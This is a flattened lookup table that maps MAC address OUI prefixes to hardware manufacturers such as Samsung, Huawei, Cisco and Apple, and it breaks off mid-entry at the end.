Samsung Electronics Co.,Ltd 0016DB Samsung Electronics Co.,Ltd 001EE2 Samsung Electronics Co.,Ltd 20D5BF Samsung Electronics Co.,Ltd 5CE8EB Samsung Electronics Co.,Ltd C0BDD1 SAMSUNG ELECTRO-MECHANICS(THAILAND) B479A7 SAMSUNG ELECTRO-MECHANICS(THAILAND) 7C11CB HUAWEI TECHNOLOGIES CO.,LTD 1C25E1 China Mobile IOT Company Limited C0F636 Hangzhou Kuaiyue Technologies, Ltd. 001A22 eQ-3 Entwicklung GmbH B0DF3A Samsung Electronics Co.,Ltd 805719 Samsung Electronics Co.,Ltd 34BE00 Samsung Electronics Co.,Ltd 54E2E0 ARRIS Group, Inc. 347A60 ARRIS Group, Inc. 001CC3 ARRIS Group, Inc. 240DC2 TCT mobile ltd 78521A Samsung Electronics Co.,Ltd 7085C6 ARRIS Group, Inc. 20BBC6 Jabil Circuit Hungary Ltd. 04FEA1 Fihonest communication co.,Ltd EC8CA2 Ruckus Wireless B80018 Htel 7472B0 Guangzhou Shiyuan Electronics Co., Ltd. 546C0E Texas Instruments EC8EAE Nagravision SA A043DB Sitael S.p.A. E0E7BB Nureva, Inc. 00808C NetAlly 049F81 NetAlly 001087 XSTREAMIS PLC 00B0B3 XSTREAMIS PLC 049FCA HUAWEI TECHNOLOGIES CO.,LTD 50016B HUAWEI TECHNOLOGIES CO.,LTD AC482D Ralinwi Nanjing Electronic Technology Co., Ltd. 002363 Zhuhai Raysharp Technology Co.,Ltd 00001B Novell, Inc. 009058 Ultra Electronics Command & Control Systems 001CFD Universal Electronics, Inc. 080087 Xyplex, Inc. DC1A01 Ecoliv Technology ( Shenzhen ) Ltd. 00549F Avaya Inc 2824FF Wistron Neweb Corporation 38256B Microsoft Mobile Oy 001CEF Primax Electronics Ltd. 000276 Primax Electronics Ltd. 4CB21C Maxphotonics Co.,Ltd 205EF7 Samsung Electronics Co.,Ltd 141F78 Samsung Electronics Co.,Ltd D84710 Sichuan Changhong Electric Ltd. 001972 Plexus (Xiamen) Co.,ltd. 002347 ProCurve Networking by HP 0024A8 ProCurve Networking by HP C09134 ProCurve Networking by HP 001969 Nortel Networks 0018B0 Nortel Networks 0016CA Nortel Networks 000FCD Nortel Networks 001BBA Nortel Networks 0004DC Nortel Networks 000CF7 Nortel Networks 00140E Nortel Networks 001E1F Nortel Networks 203AEF Sivantos GmbH 005979 Networked Energy Services 207C8F Quanta Microsystems,Inc. 000B34 ShangHai Broadband Technologies CO.LTD 74B57E zte corporation B8BB23 Guangdong Nufront CSC Co., Ltd 34EA34 HangZhou Gubei Electronics Technology Co.,Ltd 3092F6 SHANGHAI SUNMON COMMUNICATION TECHNOGY CO.,LTD A8AD3D Alcatel-Lucent Shanghai Bell Co., Ltd 24AF4A Alcatel-Lucent IPD 7C2064 Alcatel-Lucent IPD 44DC91 PLANEX COMMUNICATIONS INC. E09DB8 PLANEX COMMUNICATIONS INC. 000F59 Phonak AG 001478 TP-LINK TECHNOLOGIES CO.,LTD. 48F8E1 Nokia 8C90D3 Nokia 0028F8 Intel Corporate 58BC8F Cognitive Systems Corp. D455BE SHENZHEN FAST TECHNOLOGIES CO.,LTD 640DCE SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 54D272 Nuki Home Solutions GmbH EC26FB TECC CO.,LTD. 0020F4 SPECTRIX CORPORATION 04EE91 x-fabric GmbH B47443 Samsung Electronics Co.,Ltd FCF647 Fiberhome Telecommunication Technologies Co.,LTD 18686A zte corporation C44BD1 Wallys CommunicationsTeachnologies Co.,Ltd. 6CB9C5 Delta Networks, Inc. 30766F LG Electronics (Mobile Communications) A8922C LG Electronics (Mobile Communications) F80CF3 LG Electronics (Mobile Communications) C49A02 LG Electronics (Mobile Communications) 001F6B LG Electronics (Mobile Communications) 0026E2 LG Electronics (Mobile Communications) DC4427 IEEE Registration Authority BC3400 IEEE Registration Authority E8886C Shenzhen SC Technologies Co.,LTD 0024FF QLogic Corporation 001E21 Qisda Corporation 00039D Qisda Corporation 00080D Toshiba 000E7B Toshiba 0003B2 Radware 9C6121 SICHUAN TIANYI COMHEART TELECOMCO.,LTD 00A0C6 Qualcomm Inc. 649C81 Qualcomm Inc. 001A6A Tranzas, Inc. A47174 HUAWEI TECHNOLOGIES CO.,LTD F4CB52 HUAWEI TECHNOLOGIES CO.,LTD B808D7 HUAWEI TECHNOLOGIES CO.,LTD 94611E Wata Electronics Co.,Ltd. 00C0E4 SIEMENS BUILDING 000D10 Embedtronics Oy 001FA8 Smart Energy Instruments Inc. 000FDB Westell Technologies Inc. 3C0771 Sony Corporation 80414E BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 249442 OPEN ROAD SOLUTIONS , INC. C46413 Cisco Systems, Inc 0010CA Telco Systems, Inc. 00E09E Quantum Corporation 000A08 Alpine Electronics, Inc. 206A8A Wistron Infocomm (Zhongshan) Corporation 784476 Zioncom Electronics (Shenzhen) Ltd. 001165 ZNYX Networks, Inc. 000A68 Solarflare Communications Inc. 002186 Universal Global Scientific Industrial Co., Ltd. 183919 Unicoi Systems E8E0B7 Toshiba 680715 Intel Corporate 3CB6B7 vivo Mobile Communication Co., Ltd. C42795 Technicolor CH USA Inc. A020A6 Espressif Inc. 58528A Mitsubishi Electric Corporation C4F1D1 BEIJING SOGOU TECHNOLOGY DEVELOPMENT CO., LTD. ACE77B SICHUAN TIANYI COMHEART TELECOMCO.,LTD 2C36A0 Capisco Limited B0B2DC Zyxel Communications Corporation CC5D4E Zyxel Communications Corporation 404A03 Zyxel Communications Corporation C86C87 Zyxel Communications Corporation 001EC0 Microchip Technology Inc. 645D92 SICHUAN TIANYI COMHEART TELECOMCO.,LTD 38BC1A MEIZU Technology Co., Ltd. 802994 Technicolor CH USA Inc. E0885D Technicolor CH USA Inc. 340AFF Qingdao Hisense Communications Co.,Ltd. 587E61 Qingdao Hisense Communications Co.,Ltd. C0A1A2 MarqMetrix 08D0B7 Qingdao Hisense Communications Co.,Ltd. ECD68A Shenzhen JMicron Intelligent Technology Developmen 5052D2 Hangzhou Telin Technologies Co., Limited 90EED9 UNIVERSAL DE DESARROLLOS ELECTRÓNICOS, SA 606453 AOD Co.,Ltd. 6C98EB Riverbed Technology, Inc. 009E1E Cisco Systems, Inc 00253E Sensus Metering Systems C8AFE3 Hefei Radio Communication Technology Co., Ltd CCA260 SICHUAN TIANYI COMHEART TELECOMCO.,LTD 7C574E COBI GmbH 28F10E Dell Inc. 045604 Gionee Communication Equipment Co.,Ltd. 34C0F9 Rockwell Automation 00FEC8 Cisco Systems, Inc 2C5A8D SYSTRONIK Elektronik u. Systemtechnik GmbH 10BEF5 D-Link International E47B3F BEIJING CO-CLOUD TECHNOLOGY LTD. 0C8A87 AgLogica Holdings, Inc 54EDA3 Navdy, Inc. 40F420 SICHUAN TIANYI COMHEART TELECOMCO.,LTD 34A2A2 HUAWEI TECHNOLOGIES CO.,LTD 749D8F HUAWEI TECHNOLOGIES CO.,LTD 945907 Shanghai HITE-BELDEN Network Technology Co., Ltd. 001848 Vecima Networks Inc. 0016FB SHENZHEN MTC CO LTD A0415E Opsens Solution Inc. A860B6 Apple, Inc. C4B301 Apple, Inc. E05F45 Apple, Inc. 74CC39 Fiberhome Telecommunication Technologies Co.,LTD 3822D6 Hangzhou H3C Technologies Co., Limited 94E8C5 ARRIS Group, Inc. 6C3B6B Routerboard.com 0022E7 WPS Parking Systems 4851B7 Intel Corporate B8E779 9Solutions Oy C864C7 zte corporation 483B38 Apple, Inc. 1C9148 Apple, Inc. 905F2E TCT mobile ltd F823B2 HUAWEI TECHNOLOGIES CO.,LTD 341290 Treeview Co.,Ltd. 7CFE4E Shenzhen Safe vision Technology Co.,LTD 644FB0 Hyunjin.com 00E0E6 INCAA Computers 28F366 Shenzhen Bilian electronic CO.,LTD E0A3AC HUAWEI TECHNOLOGIES CO.,LTD BC7574 HUAWEI TECHNOLOGIES CO.,LTD 20A680 HUAWEI TECHNOLOGIES CO.,LTD 8828B3 HUAWEI TECHNOLOGIES CO.,LTD A4E597 Gessler GmbH 006CBC Cisco Systems, Inc 5C70A3 LG Electronics (Mobile Communications) 001D08 Jiangsu YinheElectronics Co.,Ltd. 001D82 GN Netcom A/S 001317 GN Netcom A/S 00A0A4 Oracle Corporation 749781 zte corporation 0001F4 Enterasys 00109B Emulex Corporation 00142A Elitegroup Computer Systems Co.,Ltd. 00115B Elitegroup Computer Systems Co.,Ltd. C03FD5 Elitegroup Computer Systems Co.,Ltd. ECA86B Elitegroup Computer Systems Co.,Ltd. C89CDC Elitegroup Computer Systems Co.,Ltd. 002511 Elitegroup Computer Systems Co.,Ltd. 4487FC Elitegroup Computer Systems Co.,Ltd. A86BAD Hon Hai Precision Ind. Co.,Ltd. D80F99 Hon Hai Precision Ind. Co.,Ltd. B4B15A Siemens AG Energy Management Division 002465 Elentec 00089F EFM Networks 0050FC Edimax Technology Co. Ltd. 9CDF03 Harman/Becker Automotive Systems GmbH 001188 Enterasys 0016FA ECI Telecom Ltd. F8A188 LED Roadway Lighting A082AC Linear DMS Solutions Sdn. Bhd. A86AC1 HanbitEDS Co., Ltd. D463FE Arcadyan Corporation 689361 Integrated Device Technology (Malaysia) Sdn. Bhd. BC15AC Vodafone Italia S.p.A. 00BD82 Shenzhen YOUHUA Technology Co., Ltd 94513D iSmart Alarm, Inc. 001174Mojo Networks, Inc. 001954 Leaf Corporation. 9466E7 WOM Engineering 4CB8B5 Shenzhen YOUHUA Technology Co., Ltd 7085C2 ASRock Incorporation EC93ED DDoS-Guard LTD 30FC68 TP-LINK TECHNOLOGIES CO.,LTD. 008A96 Cisco Systems, Inc BC60A7 Sony Interactive Entertainment Inc. 808C97 Kaonmedia CO., LTD. DCEE06 HUAWEI TECHNOLOGIES CO.,LTD 0452C7 Bose Corporation F02745 F-Secure Corporation 54D0B4 Xiamen Four-Faith Communication Technology Co.,Ltd 00137C Kaicom co., Ltd. E85659 Advanced-Connectek Inc. 34BF90 Fiberhome Telecommunication Technologies Co.,LTD CCB3F8 FUJITSU ISOTEC LIMITED E4A471 Intel Corporate 10F005 Intel Corporate 64CC2E Xiaomi Communications Co Ltd 8801F2 Vitec System Engineering Inc. 14D11F HUAWEI TECHNOLOGIES CO.,LTD DC094C HUAWEI TECHNOLOGIES CO.,LTD 1C6758 HUAWEI TECHNOLOGIES CO.,LTD 24BCF8 HUAWEI TECHNOLOGIES CO.,LTD A0043E Parker Hannifin Manufacturing Germany GmbH & Co. KG C84529 IMK Networks Co.,Ltd 7C477C IEEE Registration Authority F877B8 Samsung Electronics Co.,Ltd F0D2F1 Amazon Technologies Inc. A8E3EE Sony Interactive Entertainment Inc. 00248D Sony Interactive Entertainment Inc. 00041F Sony Interactive Entertainment Inc. 20A90E TCT mobile ltd EC438B YAPTV 980CA5 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 441102 EDMIEurope Ltd A85EE4 12Sided Technology, LLC 182195 Samsung Electronics Co.,Ltd 44783E Samsung Electronics Co.,Ltd 0CA2F4 Chameleon Technology (UK) Limited BC44B0 Elastifile 74BFB7 Nusoft Corporation 50DA00 Hangzhou H3C Technologies Co., Limited F4ED5F SHENZHEN KTC TECHNOLOGY GROUP 00E0E4 FANUC ROBOTICS NORTH AMERICA, Inc. 000896 Printronix, Inc. 245EBE QNAP Systems, Inc. 0404EA Valens Semiconductor Ltd. 800DD7 Latticework, Inc D0B53D SEPRO ROBOTIQUE 00D0EC NAKAYO Inc 4CCC6A Micro-Star INTL CO., LTD. 30636B Apple, Inc. 70884D JAPAN RADIO CO., LTD. A4F1E8 Apple, Inc. 546751 Compal Broadband Networks, Inc. 240B0A Palo Alto Networks D099D5 Alcatel-Lucent 14C3C2 K.A. Schmersal GmbH & Co. KG 10785B Actiontec Electronics, Inc DC0077 TP-LINK TECHNOLOGIES CO.,LTD. F4F5A5 Nokia Corporation EC9B5B Nokia Corporation 2CCC15 Nokia Corporation 14BB6E Samsung Electronics Co.,Ltd 1886AC Nokia Danmark A/S 001F5C Nokia Danmark A/S 001F00 Nokia Danmark A/S 002547 Nokia Danmark A/S 0018C5 Nokia Danmark A/S 00164E Nokia Danmark A/S 002668 Nokia Danmark A/S 00247D Nokia Danmark A/S 002265 Nokia Danmark A/S F88096 Elsys Equipamentos Eletrônicos Ltda A811FC ARRIS Group, Inc. 001DAA DrayTek Corp. E498D1 Microsoft Mobile Oy 6C2779 Microsoft Mobile Oy 00CF1C Communication Machinery Corporation 28CC01 Samsung Electronics Co.,Ltd D8FB5E ASKEY COMPUTER CORP 002326 FUJITSU LIMITED 0CBF15 Genetec Inc. 000D4B Roku, Inc. 0040FB CASCADE COMMUNICATIONS D0542D Cambridge Industries(Group) Co.,Ltd. 744AA4 zte corporation 001BA9 Brother industries, LTD. 30A220 ARG Telecom 6CF373 Samsung Electronics Co.,Ltd 9C3AAF Samsung Electronics Co.,Ltd 781FDB Samsung Electronics Co.,Ltd 4CA56D Samsung Electronics Co.,Ltd B86CE8 Samsung Electronics Co.,Ltd 0CB319 Samsung Electronics Co.,Ltd 183F47 Samsung Electronics Co.,Ltd B46293 Samsung Electronics Co.,Ltd 50A4C8 Samsung Electronics Co.,Ltd 00001D Cabletron Systems, Inc. 1867B0 Samsung Electronics Co.,Ltd 6C8336 Samsung Electronics Co.,Ltd DCD87C Beijing Jingdong Century Trading Co., LTD. C4DA7D Ivium Technologies B.V. 000B6A Asiarock Technology Limited 009096 ASKEY COMPUTER CORP 001B9E ASKEY COMPUTER CORP E0CA94 ASKEY COMPUTER CORP 0026B6 ASKEY COMPUTER CORP 002557 BlackBerry RTS 001CCC BlackBerry RTS 00300A Aztech Electronics Pte Ltd 001F3F AVM GmbH 246511 AVM GmbH C0FFD4 NETGEAR 6CB0CE NETGEAR 008EF2 NETGEAR 9CD36D NETGEAR C40415 NETGEAR E8FCAF NETGEAR 841B5E NETGEAR 2CB05D NETGEAR A021B7 NETGEAR 0024B2 NETGEAR 001B2F NETGEAR 00264D Arcadyan Technology Corporation 849CA6 Arcadyan Technology Corporation E03E44 Broadcom 001F33 NETGEAR 002040 ARRIS Group, Inc. 386BBB ARRIS Group, Inc. E86D52 ARRIS Group, Inc. 3C754A ARRIS Group, Inc. E48399 ARRIS Group, Inc. 002143 ARRIS Group, Inc. 74F612 ARRIS Group, Inc. 002495 ARRIS Group, Inc. 0024A0 ARRIS Group, Inc. 00080E ARRIS Group, Inc. 00909C ARRIS Group, Inc. 001225 ARRIS Group, Inc. 145BD1 ARRIS Group, Inc. 6CC1D2 ARRIS Group, Inc. 1C1448 ARRIS Group, Inc. 001784 ARRIS Group, Inc. 001C11 ARRIS Group, Inc. 001E46 ARRIS Group, Inc. 0018A4 ARRIS Group, Inc. 0018C0 ARRIS Group, Inc. 002374 ARRIS Group, Inc. ACE010 Liteon Technology Corporation 747548 Amazon Technologies Inc. 0000B1 Alpha Micro 001802 Alpha Networks Inc. 001E45 Sony Mobile Communications Inc 001CA4 Sony Mobile Communications Inc 001A75 Sony Mobile Communications Inc 78843C Sony Corporation 0013A9 Sony Corporation 000AD9 Sony Mobile Communications Inc 000E07 Sony Mobile Communications Inc 94CE2C Sony Mobile Communications Inc FC0FE6 Sony Interactive Entertainment Inc. 74DE2B Liteon Technology Corporation 00225F Liteon Technology Corporation 5C93A2 Liteon Technology Corporation 24FD52 Liteon Technology Corporation 2CD05A Liteon Technology Corporation 74E543 Liteon Technology Corporation 0015CF ARRIS Group, Inc. 6CFAA7 AMPAK Technology, Inc. 0023F1 Sony Mobile Communications Inc 54E4BD FN-LINK TECHNOLOGY LIMITED 5414FD Orbbec 3D Technology International 900BC1 Sprocomm Technologies CO.,Ltd 001CA8 AirTies Wireless Networks 485D60 AzureWave Technology Inc. DC85DE AzureWave Technology Inc. B0EE45 AzureWave Technology Inc. 00238E ADB Broadband Italia 001D8B ADB Broadband Italia 0013C8 ADB Broadband Italia DC0B1A ADB Broadband Italia 0C6AE6 Stanley Security Solutions 842615 ADB Broadband Italia F0842F ADB Broadband Italia 54271E AzureWave Technology Inc. 28C2DD AzureWave Technology Inc. 80A589 AzureWave Technology Inc. C40938 FUJIAN STAR-NET COMMUNICATION CO.,LTD 001C50 TCL Technoly Electronics (Huizhou) Co., Ltd. 00AA02 Intel Corporation ACE5F0 Doppler Labs F48E38 Dell Inc. 74C63B AzureWave Technology Inc. 7C7A91 Intel Corporate AC7BA1 Intel Corporate 6C2995 Intel Corporate 984FEE Intel Corporate E82AEA Intel Corporate 605718 Intel Corporate C4D987 Intel Corporate FCF8AE Intel Corporate 6036DD Intel Corporate 100BA9 Intel Corporate 8C705A Intel Corporate 606720 Intel Corporate 7C5CF8 Intel Corporate B4E1C4 Microsoft Mobile Oy E0757D Motorola Mobility LLC, a Lenovo Company 34BB26 Motorola Mobility LLC, a Lenovo Company 806C1B Motorola Mobility LLC, a Lenovo Company 0016EB Intel Corporate 0018DE Intel Corporate 5CE0C5 Intel Corporate 58A839 Intel Corporate 001E67 Intel Corporate 0022FA Intel Corporate 001500 Intel Corporate A088B4 Intel Corporate 648099 Intel Corporate D07E35 Intel Corporate 001E65 Intel Corporate 348446 Ericsson AB 044E06 Ericsson AB 00270E Intel Corporate 0026B9 Dell Inc. 64006A Dell Inc. 00D09E 2Wire Inc 0019E4 2Wire Inc 001AC4 2Wire Inc 001B5B 2Wire Inc 3CEA4F 2Wire Inc DC7FA4 2Wire Inc B0D5CC Texas Instruments 3829DD ONvocal Inc 001EC7 2Wire Inc 002650 2Wire Inc 002351 2Wire Inc 001E4F Dell Inc. 5C260A Dell Inc. 7845C4 Dell Inc. C81F66 Dell Inc. 0015C5 Dell Inc. 001422 Dell Inc. 109836 Dell Inc. 800A80 IEEE Registration Authority F8DB88 Dell Inc. 3CA348 vivo Mobile Communication Co., Ltd. E45AA2 vivo Mobile Communication Co., Ltd. CC3B3E Lester Electrical 2082C0 Xiaomi Communications Co Ltd DC6DCD GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD C4282D Embedded Intellect Pty Ltd 5846E1 Baxter International Inc 00173F Belkin International Inc. 001CDF Belkin International Inc. C05627 Belkin International Inc. 4C17EB Sagemcom Broadband SAS CC33BB Sagemcom Broadband SAS D86CE9 Sagemcom Broadband SAS E8F1B0 Sagemcom Broadband SAS 5C6B32 Texas Instruments 84DD20 Texas Instruments 001831 Texas Instruments 24FD5B SmartThings, Inc. 2876CD Funshion Online Technologies Co.,Ltd 205532 Gotech International Technology Limited 2CFF65 Oki Electric Industry Co., Ltd. 2C27D7 Hewlett Packard 984BE1 Hewlett Packard 002926 Applied Optoelectronics, Inc Taiwan Branch 24BA13 RISO KAGAKU CORPORATION 0017E5 Texas Instruments 0017EC Texas Instruments 0017E7 Texas Instruments 0017E9 Texas Instruments 1CBA8C Texas Instruments 0015E9 D-Link Corporation 001B11 D-Link Corporation 00265A D-Link Corporation C8BE19 D-Link International A4BA76 HUAWEI TECHNOLOGIES CO.,LTD 0050C2 IEEE Registration Authority 440010 Apple, Inc. 0056CD Apple, Inc. 006037 NXP Semiconductors DCC0EB ASSA ABLOY CÔTE PICARDE 28BC56 EMAC, Inc. 00CDFE Apple, Inc. A0F895 Shenzhen TINNO Mobile Technology Corp. 0078CD Ignition Design Labs B436A9 Fibocom Wireless Inc. 70CA4D Shenzhen lnovance Technology Co.,Ltd. 001A11 Google, Inc. 48DB50 HUAWEI TECHNOLOGIES CO.,LTD C8478C Beken Corporation 9CEFD5 Panda Wireless, Inc. 9C3426 ARRIS Group, Inc. 2C6E85 Intel Corporate 001DD1 ARRIS Group, Inc. 001DCF ARRIS Group, Inc. 001DD5 ARRIS Group, Inc. 001DD4 ARRIS Group, Inc. E498D6 Apple, Inc. 002283 Juniper Networks 0010DB Juniper Networks 00121E Juniper Networks CCA462 ARRIS Group, Inc. 484520 Intel Corporate C80E77 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited 106F3F BUFFALO.INC 9049FA Intel Corporate BC0F64 Intel Corporate 0000C5 ARRIS Group, Inc. 6455B1 ARRIS Group, Inc. 0002B3 Intel Corporation 000347 Intel Corporation 000E0C Intel Corporation D8D385 Hewlett Packard 18A905 Hewlett Packard 001B78 Hewlett Packard E4FAFD Intel Corporate 94659C Intel Corporate B0C745 BUFFALO.INC 14CFE2 ARRIS Group, Inc. 44E137 ARRIS Group, Inc. 001320 Intel Corporate 0080E1 STMicroelectronics SRL F8DB7F HTC Corporation 64A769 HTC Corporation E899C4 HTC Corporation BCCFCC HTC Corporation 0004EA Hewlett Packard 001279 Hewlett Packard 001321 Hewlett Packard 000802 Hewlett Packard 0002A5 Hewlett Packard 001871 Hewlett Packard 000E7F Hewlett Packard 001185 Hewlett Packard 10604B Hewlett Packard C8CBB8 Hewlett Packard 843497 Hewlett Packard 6CC217 Hewlett Packard 1458D0 Hewlett Packard 5C8A38 Hewlett Packard EC9A74 Hewlett Packard 2C59E5 Hewlett Packard D8FC38 Giantec Semiconductor Inc AC2A0C CSR ZHUZHOU INSTITUTE CO.,LTD. 2C6798 InTalTech Ltd. 00234D Hon Hai Precision Ind. Co.,Ltd. 002556 Hon Hai Precision Ind. Co.,Ltd. 601888 zte corporation D860B0 bioMérieux Italia S.p.A. 54E6FC TP-LINK TECHNOLOGIES CO.,LTD. 74EA3A TP-LINK TECHNOLOGIES CO.,LTD. F81A67 TP-LINK TECHNOLOGIES CO.,LTD. EC172F TP-LINK TECHNOLOGIES CO.,LTD. 847778 Cochlear Limited 887F03 Comper Technology Investment Limited 0019E0 TP-LINK TECHNOLOGIES CO.,LTD. 002586 TP-LINK TECHNOLOGIES CO.,LTD. F431C3 Apple, Inc. 64A5C3 Apple, Inc. 28565A Hon Hai Precision Ind. Co.,Ltd. 6CB56B HUMAX Co., Ltd. BC3AEA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD E422A5 PLANTRONICS, INC. D4C9B2 Quanergy Systems Inc 6021C0 Murata Manufacturing Co., Ltd. 88308A Murata Manufacturing Co., Ltd. 5CDAD4 Murata Manufacturing Co., Ltd. 0026E8 Murata Manufacturing Co., Ltd. 002512 zte corporation 001C26 Hon Hai Precision Ind. Co.,Ltd. 14E6E4 TP-LINK TECHNOLOGIES CO.,LTD. 344B50 zte corporation FCC897 zte corporation 0016CE Hon Hai Precision Ind. Co.,Ltd. 002268 Hon Hai Precision Ind. Co.,Ltd. 001882 HUAWEI TECHNOLOGIES CO.,LTD D4EA0E Avaya Inc 6CFA58 Avaya Inc 20F3A3 HUAWEI TECHNOLOGIES CO.,LTD 0C37DC HUAWEI TECHNOLOGIES CO.,LTD BC7670 HUAWEI TECHNOLOGIES CO.,LTD 24DBAC HUAWEI TECHNOLOGIES CO.,LTD 1C1D67 HUAWEI TECHNOLOGIES CO.,LTD 300ED5 Hon Hai Precision Ind. Co.,Ltd. 485AB6 Hon Hai Precision Ind. Co.,Ltd. 543530 Hon Hai Precision Ind. Co.,Ltd. F866D1 Hon Hai Precision Ind. Co.,Ltd. 2469A5 HUAWEI TECHNOLOGIES CO.,LTD EC233D HUAWEI TECHNOLOGIES CO.,LTD 78F5FD HUAWEI TECHNOLOGIES CO.,LTD 5C7D5E HUAWEI TECHNOLOGIES CO.,LTD 90671C HUAWEI TECHNOLOGIES CO.,LTD BC25E0 HUAWEI TECHNOLOGIES CO.,LTD F4E3FB HUAWEI TECHNOLOGIES CO.,LTD D02DB3 HUAWEI TECHNOLOGIES CO.,LTD E8CD2D HUAWEI TECHNOLOGIES CO.,LTD 84A8E4 HUAWEI TECHNOLOGIES CO.,LTD 0C96BF HUAWEI TECHNOLOGIES CO.,LTD 60E701 HUAWEI TECHNOLOGIES CO.,LTD E8088B HUAWEI TECHNOLOGIES CO.,LTD A051C6 Avaya Inc F0EBD0 Shanghai Feixun Communication Co.,Ltd. 643E8C HUAWEI TECHNOLOGIES CO.,LTD 0012D2 Texas Instruments A863F2 Texas Instruments 7C6097 HUAWEI TECHNOLOGIES CO.,LTD CC53B5 HUAWEI TECHNOLOGIES CO.,LTD 60DE44 HUAWEI TECHNOLOGIES CO.,LTD 105172 HUAWEI TECHNOLOGIES CO.,LTD 08E84F HUAWEI TECHNOLOGIES CO.,LTD 888603 HUAWEI TECHNOLOGIES CO.,LTD 04F938 HUAWEI TECHNOLOGIES CO.,LTD AC853D HUAWEI TECHNOLOGIES CO.,LTD 4846FB HUAWEI TECHNOLOGIES CO.,LTD D0FF50 Texas Instruments 20C38F Texas Instruments 7C669D Texas Instruments D8DDFD Texas Instruments D05FB8 Texas Instruments E0247F HUAWEI TECHNOLOGIES CO.,LTD 00464B HUAWEI TECHNOLOGIES CO.,LTD 80FB06 HUAWEI TECHNOLOGIES CO.,LTD 6CA849 Avaya Inc 64C354 Avaya Inc 50CD22 Avaya Inc B4A95A Avaya Inc 84EB18 Texas Instruments EC1127 Texas Instruments 581626 Avaya Inc 70E422 Cisco Systems, Inc 00500F Cisco Systems, Inc 7C1DD9 Xiaomi Communications Co Ltd A086C6 Xiaomi Communications Co Ltd 9C99A0 Xiaomi Communications Co Ltd 584498 Xiaomi Communications Co Ltd 00E0B0 Cisco Systems, Inc 00E0FE Cisco Systems, Inc 00E034 Cisco Systems, Inc 00E0F9 Cisco Systems, Inc C8D719 Cisco-Linksys, LLC 001079 Cisco Systems, Inc 001029 Cisco Systems, Inc 000E08 Cisco-Linksys, LLC 4403A7 Cisco Systems, Inc B0FAEB Cisco Systems, Inc 7CAD74 Cisco Systems, Inc 00603E Cisco Systems, Inc 00602F Cisco Systems, Inc 006047 Cisco Systems, Inc 0050A2 Cisco Systems, Inc 00023D Cisco Systems, Inc 203A07 Cisco Systems, Inc 00502A Cisco Systems, Inc BC16F5 Cisco Systems, Inc FC5B39 Cisco Systems, Inc 346F90 Cisco Systems, Inc 5CFC66 Cisco Systems, Inc D46D50 Cisco Systems, Inc 74A02F Cisco Systems, Inc 88908D Cisco Systems, Inc F07816 Cisco Systems, Inc 00223A Cisco SPVTG 0021BE Cisco SPVTG 14DAE9 ASUSTek COMPUTER INC. F4CFE2 Cisco Systems, Inc A80C0D Cisco Systems, Inc C07BBC Cisco Systems, Inc 24E9B3 Cisco Systems, Inc 0011D8 ASUSTek COMPUTER INC. C08C60 Cisco Systems, Inc E8EDF3 Cisco Systems, Inc E4C722 Cisco Systems, Inc 64E950 Cisco Systems, Inc F41FC2 Cisco Systems, Inc 44ADD9 Cisco Systems, Inc 0C6803 Cisco Systems, Inc 1CDEA7 Cisco Systems, Inc F07F06 Cisco Systems, Inc 88F031 Cisco Systems, Inc 0018F3 ASUSTek COMPUTER INC. 001A92 ASUSTek COMPUTER INC. 000C41 Cisco-Linksys, LLC 0016B6 Cisco-Linksys, LLC 0018F8 Cisco-Linksys, LLC 00252E Cisco SPVTG 54D46F Cisco SPVTG A4A24A Cisco SPVTG 44E08E Cisco SPVTG 00E036 PIONEER CORPORATION 00E04F Cisco Systems, Inc 0010FF Cisco Systems, Inc 001054 Cisco Systems, Inc 0010F6 Cisco Systems, Inc 0010A6 Cisco Systems, Inc BCC810 Cisco SPVTG 7CB21B Cisco SPVTG 24767D Cisco SPVTG 481D70 Cisco SPVTG F0B2E5 Cisco Systems, Inc 002332 Apple, Inc. 00236C Apple, Inc. 0023DF Apple, Inc. 002500 Apple, Inc. 0025BC Apple, Inc. 5897BD Cisco Systems, Inc 5C838F Cisco Systems, Inc ECBD1D Cisco Systems, Inc 0019E3 Apple, Inc. 001B63 Apple, Inc. 001EC2 Apple, Inc. 001FF3 Apple, Inc. 0010FA Apple, Inc. 0050E4 Apple, Inc. 000D93 Apple, Inc. 7CFADF Apple, Inc. 78A3E4 Apple, Inc. 148FC6 Apple, Inc. 286AB8 Apple, Inc. 28E02C Apple, Inc. E0B9BA Apple, Inc. 00C610 Apple, Inc. B8F6B1 Apple, Inc. 8CFABA Apple, Inc. 7CD1C3 Apple, Inc. F0DCE2 Apple, Inc. 24AB81 Apple, Inc. E0F847 Apple, Inc. 28E7CF Apple, Inc. E4CE8F Apple, Inc. A82066 Apple, Inc. BC52B7 Apple, Inc. 5C5948 Apple, Inc. C8BCC8 Apple, Inc. E8040B Apple, Inc. 145A05 Apple, Inc. 1CABA7 Apple, Inc. C0847A Apple, Inc. 34159E Apple, Inc. 58B035 Apple, Inc. DC86D8 Apple, Inc. 90B931 Apple, Inc. D0E140 Apple, Inc. 24A2E1 Apple, Inc. 04214C Insight Energy Ventures LLC F832E4 ASUSTek COMPUTER INC. 80EA96 Apple, Inc. 600308 Apple, Inc. 04F13E Apple, Inc. 98F0AB Apple, Inc. 7831C1 Apple, Inc. 783A84 Apple, Inc. 5C8D4E Apple, Inc. 8863DF Apple, Inc. 881FA1 Apple, Inc. C8E0EB Apple, Inc. 98B8E3 Apple, Inc. 885395 Apple, Inc. 786C1C Apple, Inc. 4C8D79 Apple, Inc. 1CE62B Apple, Inc. 0C3021 Apple, Inc. 0C3E9F Apple, Inc. FCFC48 Apple, Inc. 9C293F Apple, Inc. 80A1AB Intellisis 84285A Saffron Solutions Inc D4B8FF Home Control Singapore Pte Ltd 087402 Apple, Inc. 94F6A3 Apple, Inc. 98E0D9 Apple, Inc. CC29F5 Apple, Inc. 285AEB Apple, Inc. F02475 Apple, Inc. 2C1F23 Apple, Inc. 549F13 Apple, Inc. F0DBE2 Apple, Inc. 748114 Apple, Inc. 18F643 Apple, Inc. A45E60 Apple, Inc. A01828 Apple, Inc. D0034B Apple, Inc. 10417F Apple, Inc. A8667F Apple, Inc. D02598 Apple, Inc. 80BE05 Apple, Inc. 24A074 Apple, Inc. 84788B Apple, Inc. 84A423 Sagemcom Broadband SAS 3C7873 Airsonics 9C88AD Fiberhome Telecommunication Technologies Co.,LTD 88947E 